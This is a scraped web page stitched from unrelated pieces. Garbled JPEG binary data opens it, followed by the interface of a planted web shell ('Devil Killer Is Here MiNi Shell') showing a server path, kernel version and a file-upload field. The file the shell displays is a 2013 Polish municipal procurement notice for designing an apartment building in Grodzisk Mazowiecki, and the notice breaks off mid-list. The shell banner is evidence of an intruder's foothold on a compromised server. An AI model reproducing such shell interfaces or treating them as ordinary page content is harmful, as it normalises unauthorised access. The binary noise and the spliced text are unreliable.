JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130624/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130624/242056-N-2013.html

<p class="kh_header"><b>Grodzisk Mazowiecki: Wykonanie dokumentacji projektowo-kosztorysowej  oraz  pełnienie   nadzoru   autorskiego   dla   zadania   p.n. :  Budowa  budynku mieszkalnego , wielorodzinnego, komunalnego z infrastrukturą zewnętrzną  na części dz.ew.21 25 obr. 14  przy ul. Wiklinowej  w Grodzisku Mazowieckim.</b><br>
<b>Numer ogłoszenia: 242056 - 2013; data zamieszczenia: 24.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Grodzisk Mazowiecki , ul. Kościuszki 32A, 05-825 Grodzisk Mazowiecki, woj. mazowieckie, tel. 022 7555146, faks 022 7555327.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.grodzisk.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowo-kosztorysowej  oraz  pełnienie   nadzoru   autorskiego   dla   zadania   p.n. :  Budowa  budynku mieszkalnego , wielorodzinnego, komunalnego z infrastrukturą zewnętrzną  na części dz.ew.21 25 obr. 14  przy ul. Wiklinowej  w Grodzisku Mazowieckim..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres opracowania:
1.Koncepcja przedprojektowa zagospodarowania  z uwzględnieniem  lokalizacji na wskazanym obszarze (części) działki budynku wielorodzinnego dla około 45 rodzin , sieci i przyłączy mediów (wod-kan, gaz, energia elektryczna, telekomunikacja, kan-deszcz, drogi dojazdowe, parkingi ,budowle towarzyszące ) dla tej części działki 21 25 z uwzględnieniem lokalizacji przedmiotowego budynku.
2.Uzyskanie warunków do projektowania oraz niezbędnych uzgodnień dla  projektu jednego  budynku  mieszkalnego wielorodzinnego, komunalnego realizowanego  na części dz. ew. nr 21 25 obr.14 przy 
ul. Wiklinowej.
3.Projekt budowlany budynku mieszkalnego z prawem do wielokrotnego bezterminowego wykorzystania projektu oraz  możliwością wprowadzenia nieistotnych zmian i realizacji projektu ze zmianami, z planem zagospodarowania  i infrastrukturą zewnętrzną opracowaną dla części  działki niezbędnej dla jego obsługi.
4.Projekty wykonawcze we wszystkich branżach dla budynku mieszkalnego z  możliwością wprowadzenia nieistotnych zmian i realizacji projektów ze zmianami w zakresie instalacji wewnętrznych ,projekty wykonawcze sieci i przyłączy mediów, projekty towarzyszących budynków lub budowli, projekty zieleni ( z inwentaryzacją i planem wyrębu ), projekty dróg, parkingów i ciągów pieszych, projekt oświetlenia i inne konieczne dla funkcjonowania budynku.
5.Specyfikacje Techniczne Wykonania i Odbioru Robót (STWiOR) dla realizacji w w projektów
6.Kosztorysy inwestorskie z przedmiarami .
7.Kosztorysy ofertowe z przedmiarami.
8.Uzyskanie w imieniu Zamawiającego pozwolenia na budowę budynku wraz z zagospodarowaniem części działki.
2. Szczegółowy opis przedmiotu zamówienia.                                                                                                2.1.Stan istniejący:
Teren projektowanej  inwestycji jest działką gminną położoną  w Grodzisku Mazowieckim w obrębie osiedla Jaśminowa. Według Planu Zagospodarowania Przestrzennego działka o powierzchni całkowitej 15057m2 stanowi w większości (ok.11026m2) teren strefy D35MW, pozostała część to strefa D17MN i D22KD-D (ok.3156+875m2). Działka w strefie D35 skomunikowana jest poprzez ul. Wiklinową od strony zachodniej oraz ul. Forsycji od strony wschodniej .Od strony północnej graniczy z terenami PKP. Część działki w strefie D17 i D22 przeznaczona jest pod ulicę Milanowską oraz budownictwo towarzyszące - parkingi, garaże.     W najbliższym  sąsiedztwie działki 21 25 znajduje się zabudowa jednorodzinna dwukondygnacyjna  i zabudowa wielorodzinna  2- 4 kondygnacyjna . W ul. Wiklinowej znajdują się media : woda, gaz, kanalizacja sanitarna, kanalizacja deszczowa, telekomunikacja i sieć energetyczna. Zamawiający zamierza wybudować na części działki budynek wielorodzinny dla około 45 rodzin. Koncepcja zagospodarowania wskazanej części działki uwzględniająca lokalizację budynku wraz z przyłączeniem go do mediów oraz niezbędną infrastrukturą towarzyszącą jest częścią zamówienia. Podstawowym elementem zamówienia jest projekt budowlany i wykonawczy budynku mieszkalnego wielorodzinnego (około 45 mieszkań) o 3-4 kondygnacjach nadziemnych, całkowicie lub częściowo podpiwniczonego wraz z planem zagospodarowania, mediami i infrastrukturą towarzyszącą dla części działki niezbędnej do obsługi budynku.
Obowiązkiem wykonawcy będzie pozyskanie materiałów i map do projektowania, wykonanie całości prac projektowych, uzyskanie niezbędnych  uzgodnień , warunków i pozwoleń niezbędnych do kompleksowej realizacji inwestycji pod nazwą Budowa o budynku mieszkalnego wielorodzinnego komunalnego z infrastrukturą zewnętrzną na dz. ew. 21 25 obr. 14 przy ul. Wiklinowej w Grodzisku Mazowieckim, w tym uzyskanie pozwolenia na budowę oraz pełnienie nadzoru autorskiego nad realizacją zadania. Gmina przewiduje realizację zadania w latach 2014 - 2016 . Budynek należy zaprojektować w technologii tradycyjnej : ściany z bloczków gazobetonowych jednowarstwowe, ocieplone styropianem, stropy żelbetowe lub gęstożebrowe, dach dwuspadowy, drewniany kryty blachą, ściany działowe murowane z bloczków gazobetonowych i cegły. Stolarka okienna i drzwiowa zewnętrzna  PCV. W budynku należy zaprojektować  pomieszczenia na wózki, rowery i ewentualnie piwnice lokatorskie. Na parterze należy zaprojektować co najmniej 2 lokale dla osób niepełnosprawnych. Wykończenie lokali pod klucz tj. ściany w pomieszczeniach sanitarnych wykończone płytkami ceramicznymi, posadzki terakota i PCV lub panele, w kuchni  kuchenki gazowe 4-palnikowe, zlewozmywaki 1-komorowe z ociekaczem i baterią. Ogrzewanie lokali z kotłowni gazowej wbudowanej w obiekt , c.w.u  z piecy gazowych jednofunkcyjnych lub term elektrycznych. Szczegółowy standard wykończenia obiektu który będzie określony w  dokumentacji musi być uzgodniony z inwestorem. Inwestor będzie żądał zastosowania oszczędnych rozwiązań technologicznych i materiałowych.
2.2. Oczekiwane parametry techniczne:
1.Zestawienie powierzchni:
1)powierzchnia terenu - około 15.000 m2 ,
2)powierzchnia zabudowy dla 1 budynku - około  600,00 m2 ,
3)powierzchnia użytkowa  około - 2400,00 m2
2.Dane techniczne:
1)wysokość górnej krawędzi elewacji frontowej - około 12,00 mb,
2)ilość kondygnacji podziemnych - ewentualnie 1 dla kotłowni ,
3)ilość kondygnacji naziemnych - 3-4,
4)ilość mieszkań  w budynku - około  45-50  ,
5) miejsca parkingowych na części działki w strefie D17 i D22
3.Dane konstrukcyjne:
1)część nadziemna  w konstrukcji murowanej,
2)fundamenty -  żelbetowe,
3)stropy - żelbetowe wylewane na budowie lub prefabrykowane gęstożebrowe,
4)ściany działowe murowane z, cegły ceramicznej pełnej, pustaków ceramicznych lub z betonu komórkowego, cegły kratówki,
5)dach - dwuspadowy o konstrukcji drewnianej kryty blachą fałdową, ocieplony (lub inny dopuszczony w MPZP)
4.Oczekiwana struktura lokali mieszkalnych
1)lokale dwupokojowe o łącznej powierzchni  od  40 m2 do 45m2-  25 szt.
2)lokale jednopokojowe o powierzchni  od 30 do 35m  - 10 szt.
3)lokale dwupokojowe od 45 m2 do 55 m2 - 10 szt. 
5.Instalacje wewnętrzne:
1)woda ciepła i zimna, 
2)instalacja gazowa dla centralnego ogrzewania,
3)Instalacja gazowa dla piecy c.w.u i kuchenek gazowych ,
4)kanalizacja sanitarna,
5)kanalizacja deszczowa,
6)wentylacja grawitacyjna,
7)instalacja  elektryczna  oświetlenia i gniazd wtykowych z licznikami dla każdego lokalu
8)system domofonowy,
9)instalacja telefoniczna wraz z przyłączem do budynku,
10)instalacja telewizji zbiorczej
11)instalacja piorunochronna
6.Standard wykończenia budynku:
1)elewacja - docieplenie styropianem  + tynk akrylowy malowany farbą silikatową,
2)okna pcv z napowietrzaczem ,
3)drzwi wejściowe pcv,
4)drzwi zewnętrzne do lokali - wzmocnione,
5)drzwi wewnątrz lokalowe - płytowe,
6)tynki - cementowo - wapienne,
7)posadzki cementowe + wykładziny PCV, lub panele oraz terakota
8)tynki malowane farbami emulsyjnymi, w pomieszczeniach sanitarnych zmywalne
9)kuchenki gazowe  z piekarnikiem,
10)zlewozmywak kuchenny jednokomorowy z ociekaczem   i  baterią,
11)wanna lub brodzik, umywalka i miska ustępowa + baterie.
7.Zagospodarowanie terenu:
1)drogi i ciągi piesze,
2)plac zabaw i tereny zielone
3)parkingi dla samochodów osobowych
4)oświetlenie terenu
5)budowle towarzyszące np. śmietnik
8.Przyłącza infrastruktury technicznej:
1)przyłącze wody ,
2)przyłącze kanalizacji sanitarnej,
3)przyłącze energetyczne ,
4)przyłącze gazowe 
5)przyłącze teletechniczne
Dokumentacja techniczna powinna być wykonana zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004 roku w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót oraz programu funkcjonalno - użytkowego oraz wytycznymi i uzgodnieniami z Zamawiającym.
Kosztorys inwestorski powinien być wykonany zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18.05.2004 roku w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno -użytkowym.
Dokumentację należy wykonać w 5 egzemplarzach w formie papierowej oraz w dwóch egzemplarzach w formie elektronicznej.
Projektant będzie zobowiązany do uzgodnienia z Zamawiającym koncepcji projektowej oraz projektowanych rozwiązań technologicznych i materiałowych.
2.3Pełnienie nadzoru autorskiego wielobranżowego nad inwestycją wykonaną w oparciu o wykonana dokumentację. Zakres nadzoru autorskiego Wykonawcy obejmuje czynności wynikające z treści ustawy z dnia 7 lipca 1194 roku - Prawo budowlane (Dz. U z 2010 r., Nr 243, poz. 1623 ze zm.). Dodatkowo w ramach sprawowania nadzoru autorskiego Wykonawca zobowiązuje się do wykonywania następujących czynności:
1)udziału w komisjach i naradach technicznych organizowanych przez Zamawiającego,
2)udziału w odbiorach częściowych, odbiorach zanikających oraz odbiorze końcowym,
3)udziału w próbach instalacji i rozruchach,
4)udziału w uzgodnieniach możliwości wprowadzenia rozwiązań zamiennych.
2.4 Szczegółowe warunki realizacji przedmiotu zamówienia, w tym warunki rękojmi za wady
określa wzór umowy stanowiący załącznik nr 8 do SIWZ..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje udzielenia zamówień uzupełniających w wysokości do 20% zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium.
1)Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości:
 7 000,00	PLN
Słownie: siedem tysięcy złotych.
2.Forma wadium.
1)Wadium może być wniesione w jednej lub kilku następujących formach:
a)pieniądzu;
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z tym, że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
c)gwarancjach bankowych;
d)gwarancjach ubezpieczeniowych;
e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U.  z 2007 r, Nr 42, poz. 275, z 2008 r., Nr 116 poz.730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).
2)W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczeń, powinny być one bezwarunkowe i nieodwołalne, płatne na pierwsze żądanie, sporządzone zgodnie z obowiązującym prawem i winny zawierać następujące elementy:
a)nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji poręczenia (Zamawiającego), gwaranta/poręczyciela (banku lub instytucji ubezpieczeniowej udzielających gwarancji poręczenia) oraz wskazanie ich siedzib,
b)określenie wierzytelności, która ma być zabezpieczona gwarancją poręczeniem,
c)kwotę gwarancji poręczenia,
d)termin ważności gwarancji poręczenia,
e)zobowiązanie gwaranta do: zapłacenia kwoty gwarancji poręczenia  na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
- odmówił podpisania umowy na warunkach określonych w ofercie, 
- nie wniósł zabezpieczenia należytego wykonania umowy, 
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
- w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 ustawy p.z.p., nie złożył dokumentów lub oświadczeń o których mowa w art. 25 ust. 1 ustawy p.z.p. , lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
dopuszcza się równoważną treść zobowiązania
3. Miejsce i sposób wniesienia wadium.
1) Wadium wnoszone w pieniądzu należy wpłacić na następujący rachunek Zamawiającego:
Bank  PKO S.A.  ul. Grzybowska 53 57 00-950 Warszawa  
nr 88 1240 6348 1111 0010 4058 8554
Do oferty należy dołączyć kopię polecenia przelewu potwierdzoną za zgodność z oryginałem.
2)Wadium wnoszone w innych dopuszczonych przez Zamawiającego formach należy złożyć w oryginale wraz z ofertą przed upływem terminu składania ofert.  
4.Termin wniesienia wadium.
Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert. 
W wymienionym przypadku dołączenie do oferty kopii polecenia przelewu wystawionego przez Wykonawcę jest warunkiem koniecznym, ale niewystarczającym do stwierdzenia przez Zamawiającego terminowego wniesienia wadium przez Wykonawcę.
5.Zwrot wadium.
Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 ustawy pzp.  
6.Utrata wadium.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: 
1)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych   
w ofercie; 
2)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących  po stronie Wykonawcy;
4)w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 p.z.p., nie złożył dokumentów lub oświadczeń o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba, że udowodni, że wynika to z  przyczyn nie leżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 p.z.p. zał. Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, wykonali co najmniej dwie usługi polegające na: wykonaniu dokumentacji projektowej obiektu budowlanego lub wykonaniu dokumentacji projektowej przebudowy rozbudowy obiektu budowlanego
- o kubaturze całkowitej nie mniejszej niż 4000 m3 (każda z usług) i wartości prac projektowych nie mniejszej niż 130.000 zł brutto  (każda z usług).
Ocena spełnienia tego warunku zostanie dokonana na podstawie przedłożonego wraz z ofertą wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług , w okresie ostatnich trzech lat przed upływem terminu składnia ofert , a jeżeli okres prowadzenia działalności jest krótszy-  w tym okresie, wraz z podaniem ich wartości , przedmiotu dat wykonania  i podmiotów , na rzecz których usługi zostały wykonywane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. załącznik nr 3 do SIWZ.
(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będą ich łączne kwalifikacje i doświadczenie).
Za główne  usługi uważa się usługi niezbędne do wykazania spełnienia warunku określonego w pkt. 9 pkt. 2.2) SIWZ.
W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 p.z.p. zał. Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawcy wykażą, że dysponują osobami zdolnymi do wykonania przedmiotu zamówienia posiadającymi uprawnienia budowlane w rozumieniu przepisów ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623 z późn. zm.), tj.:
1)co najmniej jedną osobą posiadającą uprawnienia budowlane do projektowania w specjalności architektonicznej,
2)co najmniej jedną osobą posiadającą uprawnienia budowlane do projektowania w specjalności konstrukcyjno - budowlanej,
3)co najmniej jedną osobą posiadającą uprawnienia budowlane do projektowania w specjalności telekomunikacyjnej,
4)co najmniej jedną osobą posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
5)co najmniej jedną osobą posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
Zamawiający, określając wymogi dla osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623 z późn. zm.), a także ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. Nr 63 poz. 394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 p.z.p. zał. Nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
